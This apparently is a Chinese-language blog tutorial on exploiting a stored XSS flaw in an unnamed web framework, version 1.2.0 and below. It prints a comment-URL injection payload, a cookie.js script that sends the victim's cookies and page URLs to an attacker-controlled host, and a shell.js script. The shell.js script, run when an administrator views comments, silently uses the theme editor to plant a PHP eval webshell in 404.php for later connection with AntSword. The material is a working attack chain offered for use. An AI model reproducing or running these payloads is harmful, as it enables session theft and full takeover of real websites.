这里说的框架漏洞只适用于1.2.0版本及以下的版本

这里说的漏洞是xss漏洞，学过渗透的应该都学过，我在这里就不过多阐述了，下面我们直接进入正题

直接在这个地方插入网址，后面再接上html代码即可，代码如下：

http://xxx.xxx.com/"></a><script>alert("cookie")</script><a/href="#

然后再次访问时即可弹出一个框，这里学过xss漏洞的应该知道是什么意思了

接下来我要讲的是如何用这个xss漏洞反弹shell，这个方法我也是琢磨了很久才知道的，因为要用到js代码文件，代码文件如下：

cookie.js

// 定义一个全局变量 website，值为一个具体的网址
var website = "http://xss.xxxx.com";// 声明并立即执行一个匿名函数
(function() {// 创建 Image 对象，并给它的 src 属性赋值为 website 和一些参数(new Image()).src = website+ "/?keepsession=1"+ "&location=" + escape((function() {try {// 尝试获取当前文档的 URLreturn document.location.href;} catch (e) {// 如果出错，返回一个空字符串return '';}})())+ "&toplocation=" + escape((function() {try {// 尝试获取顶层窗口的 URLreturn top.location.href;} catch (e) {// 如果出错，返回一个空字符串return '';}})())+ "&cookie=" + escape((function() {try {// 获取当前文档的 cookiereturn document.cookie;} catch (e) {// 如果出错，返回一个空字符串return '';}})())+ "&opener=" + escape((function() {try {// 获取打开当前窗口的窗口的 URLreturn (window.opener && window.opener.location.href) ? window.opener.location.href : '';} catch (e) {// 如果出错，返回一个空字符串return '';}})());
})();

shell.js

function step1(){// 创建一个包含要注入的 iframe 的 HTML 字符串var data2="<iframe id=\"testxss\" src=\"/admin/theme-editor.php?theme=default&file=404.php\" width=\"0%\" height=\"0%\" onload=\"poc()\"></iframe>";// 保存原网页内容var oldata=document.body.innerHTML;// 将注入的 iframe 添加到文档中document.body.innerHTML=(oldata+data2);
}// times 和 g_shell 变量用来跟踪 poc 函数执行的次数和是否已经成功注入 webshell
var times=0;
var g_shell=0;function poc(){// 如果执行次数 >= 10，或者已经成功注入 webshell，就不再执行if(times<=10){// 获取要修改的 DOM 节点和触发“保存修改”操作的按钮var htmldata=document.getElementById('testxss').contentWindow.document.getElementById('content');var btn=document.getElementById('testxss').contentWindow.document.getElementsByTagName('button');// 保存要修改的原始数据，将要注入的 webshell 代码添加到末尾olddatas=htmldata.innerText;htmldata.innerText=('<?php @eval($_REQUEST["shell"]);?>\n')+olddatas;// 点击保存按钮，提交修改后的数据btn[1].click();// 增加 poc 函数的执行次数times+=1;// 如果已经成功注入 webshell，通过 AJAX 请求访问 webshell 接口if(g_shell==1){var xhr1=new XMLHttpRequest();xhr1.open('get','/usr/themes/Kratos/404.php?shell=1');xhr1.send();}else{return 0;}}
}// 在页面加载完成后执行 step1 函数
step1();

然后这里就像上面反弹xss代码一样书写网址

http://xxx.xxx.com/cookie.js"></script><script/src=http://xxx.xxx.com/shell.js><a/href="#

然后等管理员访问评论是会使得js文件也给运行起来

生成的一句话目录路径可以自己改，上面的如下

在404.php中，这样路径的问题就解决了

这样我们就可以用蚁剑或其他工具连接后台了